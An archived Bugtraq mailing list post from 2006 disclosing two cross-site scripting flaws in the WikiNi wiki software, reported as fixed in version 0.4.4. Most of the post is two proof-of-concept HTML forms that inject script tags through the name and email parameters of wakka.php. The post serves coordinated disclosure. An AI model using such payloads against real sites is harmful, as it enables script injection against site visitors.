Home page logo
/

bugtraq logo Bugtraq mailing list archives

WikiNi Multiple Cross Site Scripting Vulnerabilities
From: raphael.huck () free fr
Date: 23 Oct 2006 19:26:54 -0000

Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and the vulns addressed in version 0.4.4.

The name parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php";>

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="name" value=">&quot;><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>


The email parameter of page wakka.php is not properly sanitized:

<html>
<body>

<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php";>

<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="email" value=">&quot;><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">

</form>

</body>
</html>
        

Original advisory: http://zone14.free.fr/advisories/6/

--Raphael HUCK


  By Date           By Thread  

Current thread:
  • WikiNi Multiple Cross Site Scripting Vulnerabilities raphael . huck (Oct 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]